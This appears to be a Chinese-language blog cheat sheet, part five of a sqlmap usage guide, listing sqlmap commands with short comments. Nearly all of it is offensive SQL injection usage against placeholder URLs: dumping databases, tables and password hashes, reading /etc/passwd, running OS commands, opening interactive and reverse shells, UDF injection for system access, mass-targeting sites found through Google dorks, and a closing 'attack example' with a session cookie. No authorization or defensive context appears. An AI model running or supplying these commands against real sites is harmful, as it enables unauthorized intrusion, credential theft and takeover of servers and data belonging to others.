1. 程式人生 > >Sqlmap使用指南(五)

Sqlmap使用指南(五)

本文是使用指南四的簡化版
基本步驟
sqlmap -u “http://url/news?id=1” –current-user #獲取當前使用者名稱稱
sqlmap -u “http://www.xxoo.com/news?id=1” –current-db #獲取當前資料庫名稱
sqlmap -u “http://www.xxoo.com/news?id=1” –tables -D “db_name” #列表名
sqlmap -u “http://url/news?id=1” –columns -T “tablename” users-D “db_name” -v 0 #列欄位
sqlmap -u “http://url/news?id=1

” –dump -C “column_name” -T “table_name” -D “db_name” -v
0 #獲取欄位內容
資訊獲取
sqlmap -u “http://url/news?id=1” –smart –level 3 –users # smart 智慧 level 執行測試等級sqlmap -u “http://url/news?id=1” –dbms “Mysql” –users # dbms 指定資料庫型別
sqlmap -u “http://url/news?id=1” –users #列資料庫使用者
sqlmap -u “http://url/news?id=1” –dbs#列資料庫
sqlmap -u “
http://url/news?id=1
” –passwords #資料庫使用者密碼
sqlmap -u “http://url/news?id=1” –passwords-U root -v 0 #列出指定使用者資料庫密碼
sqlmap -u “http://url/news?id=1” –dump -C “password,user,id” -T “tablename” -D “db_name”
–start 1 –stop 20 #列出指定欄位,列出 20 條
sqlmap -u “http://url/news?id=1” –dump-all -v 0 #列出所有資料庫所有表
sqlmap -u “http://url/news?id=1
” –privileges #檢視許可權
sqlmap -u “http://url/news?id=1” –privileges -U root #檢視指定使用者許可權
sqlmap -u “http://url/news?id=1” –is-dba -v 1 #是否是資料庫管理員
sqlmap -u “http://url/news?id=1” –roles #列舉資料庫使用者角色
sqlmap -u “http://url/news?id=1” –udf-inject #匯入使用者自定義函式(獲取系統許可權!)
sqlmap -u “http://url/news?id=1” –dump-all –exclude-sysdbs -v 0 #列出當前庫所有表
sqlmap -u “http://url/news?id=1” –union-cols #union 查詢表記錄
sqlmap -u “http://url/news?id=1” –cookie “COOKIE_VALUE” #cookie 注入
sqlmap -u “http://url/news?id=1” -b #獲取 banner 資訊
sqlmap -u “http://url/news?id=1” –data “id=3” #post 注入
sqlmap -u “http://url/news?id=1” -v 1 -f #指紋判別資料庫型別
sqlmap -u “http://url/news?id=1” –proxy”http://127.0.0.1:8118” #代理注入
sqlmap -u “http://url/news?id=1“–string”STRING_ON_TRUE_PAGE” #指定關鍵詞
sqlmap -u “http://url/news?id=1” –sql-shell #執行指定 sql 命令
sqlmap -u “http://url/news?id=1” –file /etc/passwd
sqlmap -u “http://url/news?id=1” –os-cmd=whoami #執行系統命令sqlmap -u “http://url/news?id=1” –os-shell #系統互動 shell
sqlmap -u “http://url/news?id=1” –os-pwn #反彈 shell
sqlmap -u “http://url/news?id=1” –reg-read #讀取 win 系統登錄檔
sqlmap -u “http://url/news?id=1” –dbs-o “sqlmap.log” #儲存進度
sqlmap -u “http://url/news?id=1” –dbs -o “sqlmap.log” –resume #恢復已儲存進度
sqlmap -g “google 語法” –dump-all –batch #google 搜尋注入點自動 跑出所有欄位
攻擊例項:
sqlmap -u “http://url/news?id=1&Submit=Submit” –cookie=”PHPSESSID=41aa833e6d0d
28f489ff1ab5a7531406” –string=”Surname” –dbms=mysql –users –password